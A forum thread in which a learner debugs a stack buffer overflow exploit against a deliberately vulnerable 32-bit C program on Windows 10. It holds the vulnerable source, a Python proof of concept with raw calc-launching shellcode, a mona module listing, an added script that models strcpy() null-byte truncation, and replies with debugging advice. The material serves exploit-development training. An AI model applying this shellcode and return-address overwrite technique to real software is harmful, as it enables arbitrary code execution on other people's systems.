KR_Nails
(x_212)
May 24, 2019, 11:53pm
1
I am trying to exploit this exercise on Windows 10 64-bit, but the executable is 32-bit. I can really exploit the program, but I want to redirect to calc.exe shellcode instead of letsprint; however, when I try to inject my own shellcode, it doesn't work.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Vulnerable by design: a 15-byte stack buffer filled by an unbounded strcpy(). */
int copytobuffer(char* input){
    char buffer[15];
    strcpy (buffer,input);      /* overflow: runs past buffer into saved EBP and the return address */
    return 0;
}

/* Never called by the program itself; the exercise's target for a redirected return address. */
void letsprint()
{
    printf("Hey!! , you succeeded\n");
    exit(0);
}

int main (int argc, char *argv[])
{
    int local_variable = 1;
    if (argc < 2)
        return 1;               /* no argument: nothing to copy, avoid strcpy(buffer, NULL) */
    copytobuffer(argv[1]);      /* argv[1] is the attacker-controlled input */
    exit(0);
}
#!/usr/bin/python
# Python 2: plain "..." literals are byte strings, which is what the payload needs.
import sys, subprocess, struct
junk = "A" * 27                      # filler up to the saved return address
function = "\x24\x15\x40"            # three low bytes of the target address (little-endian)
nops = "\x90" * 20                   # NOP sled in front of the shellcode
shellcode = ""                       # 32-bit Windows shellcode that runs calc.exe
shellcode += "\x50\x53\x51\x52\x56\x57\x55\x89"
shellcode += "\xe5\x83\xec\x18\x31\xf6\x56\x6a"
shellcode += "\x63\x66\x68\x78\x65\x68\x57\x69"
shellcode += "\x6e\x45\x89\x65\xfc\x31\xf6\x64"
shellcode += "\x8b\x5e\x30\x8b\x5b\x0c\x8b\x5b"
shellcode += "\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10"
shellcode += "\x89\x5d\xf8\x31\xc0\x8b\x43\x3c"
shellcode += "\x01\xd8\x8b\x40\x78\x01\xd8\x8b"
shellcode += "\x48\x24\x01\xd9\x89\x4d\xf4\x8b"
shellcode += "\x78\x20\x01\xdf\x89\x7d\xf0\x8b"
shellcode += "\x50\x1c\x01\xda\x89\x55\xec\x8b"
shellcode += "\x58\x14\x31\xc0\x8b\x55\xf8\x8b"
shellcode += "\x7d\xf0\x8b\x75\xfc\x31\xc9\xfc"
shellcode += "\x8b\x3c\x87\x01\xd7\x66\x83\xc1"
shellcode += "\x08\xf3\xa6\x74\x0a\x40\x39\xd8"
shellcode += "\x72\xe5\x83\xc4\x26\xeb\x41\x8b"
shellcode += "\x4d\xf4\x89\xd3\x8b\x55\xec\x66"
shellcode += "\x8b\x04\x41\x8b\x04\x82\x01\xd8"
shellcode += "\x31\xd2\x52\x68\x2e\x65\x78\x65"
shellcode += "\x68\x63\x61\x6c\x63\x68\x6d\x33"
shellcode += "\x32\x5c\x68\x79\x73\x74\x65\x68"
shellcode += "\x77\x73\x5c\x53\x68\x69\x6e\x64"
shellcode += "\x6f\x68\x43\x3a\x5c\x57\x89\xe6"
shellcode += "\x6a\x0a\x56\xff\xd0\x83\xc4\x46"
shellcode += "\x5d\x5f\x5e\x5a\x59\x5b\x58\xc3"
payload = junk + function + nops + shellcode
# The payload reaches the target as argv[1] and is copied by strcpy(); strcpy()
# stops at the first 0x00, so the payload must not contain one before its end.
subprocess.call(['traditional_stack.exe', payload])
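The payload above is delivered through argv[1] and then copied by strcpy(), so two things decide whether the shellcode ever runs: whether any byte before the end of the payload is 0x00 (strcpy() stops there), and what four bytes actually end up at the saved return address. The script below models exactly that; it is an added check, not code from the thread. It assumes the 27-byte offset from the posted PoC, treats the posted three bytes \x24\x15\x40 as the low three bytes of an address inside the non-ASLR exe image (the mona listing later in the thread shows stack-overflow.exe at base 0x00400000 with ASLR False), uses a constructed stand-in for the shellcode, and uses a placeholder address 0x74a51234 that is not a real jmp esp, only a NUL-free value for comparison. It is written for Python 3 (bytes literals).

```python
import struct

# Layout taken from the posted PoC: 27 bytes of filler reach the saved return address.
OFFSET_TO_RET = 27
NOPS = b"\x90" * 20

# Constructed stand-in for the posted calc shellcode (not the real bytes).
SHELLCODE_STANDIN = b"\xcc" * 8


def strcpy_copy(payload: bytes) -> bytes:
    """Model what strcpy() writes into the destination: every byte up to the
    first NUL in the source, followed by the NUL terminator it appends."""
    end = payload.find(b"\x00")
    body = payload if end < 0 else payload[:end]
    return body + b"\x00"


def find_bad_chars(payload: bytes, bad: bytes = b"\x00") -> list:
    """Offsets of bytes the delivery channel cannot carry. For argv -> strcpy()
    the one byte that is certainly fatal is 0x00; pass a wider set if the
    target's input path filters more."""
    return [i for i, b in enumerate(payload) if b in bad]


def build_payload(ret_bytes: bytes, shellcode: bytes = b"", nops: bytes = NOPS) -> bytes:
    """Same layout as the posted PoC: filler, return address, NOP sled, shellcode."""
    return b"A" * OFFSET_TO_RET + ret_bytes + nops + shellcode


def eip_after_ret(payload: bytes, offset: int = OFFSET_TO_RET):
    """The 32-bit little-endian value that copytobuffer()'s `ret` pops, given what
    strcpy() copied. Returns None when the saved EIP is not fully overwritten
    (the remaining bytes are whatever was on the stack, which this model
    does not know)."""
    copied = strcpy_copy(payload)
    if len(copied) < offset + 4:
        return None
    return struct.unpack("<I", copied[offset:offset + 4])[0]


def shellcode_lands(payload: bytes, shellcode: bytes) -> bool:
    """True if the shellcode bytes survive strcpy() into the destination buffer."""
    return shellcode in strcpy_copy(payload)


def check(payload: bytes, shellcode: bytes) -> dict:
    return {
        "bad_offsets": find_bad_chars(payload),
        "eip": eip_after_ret(payload),
        "shellcode_lands": shellcode_lands(payload, shellcode),
    }


if __name__ == "__main__":
    cases = {
        "3-byte address last (strcpy's NUL completes it)":
            b"A" * OFFSET_TO_RET + b"\x24\x15\x40",
        "3-byte address followed by NOPs (posted layout)":
            build_payload(b"\x24\x15\x40", SHELLCODE_STANDIN),
        "4-byte address containing 0x00":
            build_payload(b"\x24\x15\x40\x00", SHELLCODE_STANDIN),
        "NUL-free placeholder address 0x74a51234 (not a real jmp esp)":
            build_payload(b"\x34\x12\xa5\x74", SHELLCODE_STANDIN),
    }
    for name, p in cases.items():
        r = check(p, SHELLCODE_STANDIN)
        eip = "not fully overwritten" if r["eip"] is None else "0x%08x" % r["eip"]
        print("%-62s EIP=%s bad=%s shellcode_lands=%s"
              % (name, eip, r["bad_offsets"], r["shellcode_lands"]))
```

The cases show the trade-off directly: a three-byte address only becomes 0x0040xxxx when it is the last thing in the payload, because strcpy()'s own terminator supplies the high 0x00; once a NOP sled follows it, the fourth byte is 0x90 and EIP becomes 0x90xxxxxx instead. Writing the 0x00 explicitly fixes EIP but truncates everything after it, so the shellcode never reaches the stack. A return address that is NUL-free end to end is what lets the shellcode land, and the mona listing later in the thread shows KERNELBASE.dll with ASLR True and Rebase True, so any such address taken from that module has to be re-read in the debugger after each reboot rather than hardcoded.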
Your shellcode is not very readable. Do you have mitigations enabled? Where is calc running/stored? We need more information about your environment
dtm
May 25, 2019, 1:03am
3
How did you compile this? using which compiler? If gcc, with which flags? If MSVC++, are you using default flags?
It was compiled like this:
gcc.exe -m32 file.c -o file.exe
but I also added -fno-stack-protector; it doesn't work either.
dtm
May 25, 2019, 1:29am
5
Have you tried to figure out why it doesn’t work? Where does it break?
I know I have control over EIP.
#!/usr/bin/python
import sys, subprocess, struct
junk = "A" * 27                      # filler up to the saved return address
eip = "B" * 4                        # 0x42424242 should show up in EIP
payload = junk + eip
#subprocess.call(['stack-overflow.exe', payload])
with open("a", 'wb') as f:           # binary mode: no newline translation of payload bytes
    f.write(payload)
If I change my EIP to letsprint it works, but if I change it to my jmp esp (kernelbase) and shellcode, it doesn't work.
dtm
May 25, 2019, 1:44am
7
Have you checked kernelbase with ASLR? Maybe that's why it's not working. Are you checking using a debugger? If so, are you starting the process with the debugger or are you attaching?
How can I compile this with Visual C++ (cl)?
gcc.exe -m32 -fno-stack-protector --no-pie -z stackexec "C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.c" -o "C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.exe"
dtm
May 25, 2019, 2:08am
9
As you said before, you can control EIP, so I don't think your program has the issue. Try running your program and then attaching with a debugger (rather than starting the program with the debugger) and check, when you jump to kernelbase, that the address and instructions are correct.
KR_Nails
(x_212)
May 25, 2019, 3:07am
11
0BADF00D -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D Module info :
0BADF00D -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D 0x74a50000 | 0x74c34000 | 0x001e4000 | True | True | True | False | True | 10.0.17134.376 [KERNELBASE.dll] (C:\WINDOWS\System32\KERNELBASE.dll)
0BADF00D 0x77c50000 | 0x77de0000 | 0x00190000 | True | True | True | False | True | 10.0.17134.228 [ntdll.dll] (C:\WINDOWS\SYSTEM32\ntdll.dll)
0BADF00D 0x76460000 | 0x76540000 | 0x000e0000 | True | True | True | False | True | 10.0.17134.376 [KERNEL32.DLL] (C:\WINDOWS\System32\KERNEL32.DLL)
0BADF00D 0x00400000 | 0x0041b000 | 0x0001b000 | False | True | False | False | False | -1.0- [stack-overflow.exe] (C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.exe)
Here is how it looks. I think maybe I created the PoC in the wrong way. I can only jump to the function instead of popping a w00t.
dtm
May 25, 2019, 3:11am
12
Does your exploit work under manual debugging?
KR_Nails
(x_212)
May 25, 2019, 3:13am
13
It works, but the only thing I can achieve is letsprint instead of popping a calc.
dtm
May 25, 2019, 3:14am
14
Perhaps your shellcode is incorrect? Have you verified if that is working?
KR_Nails
(x_212)
May 25, 2019, 3:16am
15
It works, because I used it on Windows 7 and it popped a calc.exe. I also used the Windows 10 pop-calc and it doesn't work. Maybe I created this sample in the wrong way.
dtm
May 25, 2019, 3:17am
16
Step through your shellcode in a debugger and find out where it goes wrong.
system
(system)
Closed
June 23, 2019, 11:53pm
17
This topic was automatically closed after 30 days. New replies are no longer allowed.